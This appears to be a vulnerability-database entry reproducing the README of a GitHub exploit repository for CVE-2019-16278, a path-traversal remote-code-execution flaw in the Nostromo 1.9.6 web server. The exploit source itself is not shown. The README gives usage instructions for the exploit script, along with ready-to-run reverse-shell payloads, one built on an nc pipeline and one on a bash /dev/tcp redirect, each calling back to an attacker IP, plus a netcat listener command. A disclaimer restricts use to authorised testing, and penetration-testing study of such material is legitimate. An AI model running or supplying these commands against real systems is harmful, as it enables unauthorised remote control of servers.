Related vulnerability
Description
An unauthenticated attacker can force the server to point to a shell file such as ‘/bin/sh’ and execute arbitrary commands, because the server fails to verify the URL, which allows path traversal to any file that exists on the system. Nostromo versions such as 1.9.6 fail to verify this URL.
Introduction
**Repository:** [https://github.com/CybermonkX/CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution.git](https://github.com/CybermonkX/CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution.git)
## 📜 Description
This repository contains a Python exploit for **CVE-2019-16278**, a vulnerability in **Nostromo 1.9.6** (a web server). The vulnerability allows for **Remote Code Execution (RCE)** by exploiting directory traversal to execute arbitrary commands on the target system.
## 🚀 Features
- Execute custom shell commands on the vulnerable target.
- Support for reverse shell payloads.
- Ability to customize the size of the response from the target.
---
## 🛠️ Requirements
- **Python 3.x**
- A machine running **Nostromo 1.9.6** (the vulnerable target).
- **Netcat (nc)** to catch reverse shells.
---
## ⚙️ Usage
### Step 1: Clone the Repository
```bash
git clone https://github.com/CybermonkX/CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution.git
cd CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution
```
### Step 2: Run the Exploit
```bash
python3 CVE-2019-16278.py -t <TARGET_IP> -p <PORT> -c "<COMMAND>" [-b <BYTES_TO_READ>]
```
### Arguments:
| Argument | Description | Required | Default |
|----------|-------------|----------|---------|
| `-t`, `--target` | The target IP address | Yes | None |
| `-p`, `--port` | The target port | Yes | None |
| `-c`, `--command` | The command to execute on the server | Yes | None |
| `-b`, `--bytes` | Number of bytes to read in response | No | 4096 |
---
## 🧑‍💻 Examples
### Example 1: Run whoami on the Target
```bash
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "whoami"
```
### Example 2: Reverse Shell with Netcat
Step 1: Start a Netcat listener on your attacking machine:
```bash
nc -lvnp 443
```
Step 2: Execute the exploit with a reverse shell payload:
```bash
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.16.5 443 > /tmp/f"
```
### Example 3: Reverse Shell using /dev/tcp
```bash
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "bash -i >& /dev/tcp/10.10.16.5/443 0>&1"
```
---
## 🔍 Vulnerability Details
- **CVE:** CVE-2019-16278
- **Affected Software:** Nostromo 1.9.6 Web Server
- **Type:** Directory Traversal -> Remote Code Execution
---
## ⚠️ Disclaimer
This tool is intended for educational purposes only. Do not use it on systems you do not own or have explicit permission to test. Unauthorized access to systems is illegal. Use responsibly.
File snapshot
[4.0K] /data/pocs/62dc2c0dd44576a01aa57231819c48d232484a6a
├── [1.2K] exploit.py
└── [2.3K] README.md
0 directories, 2 files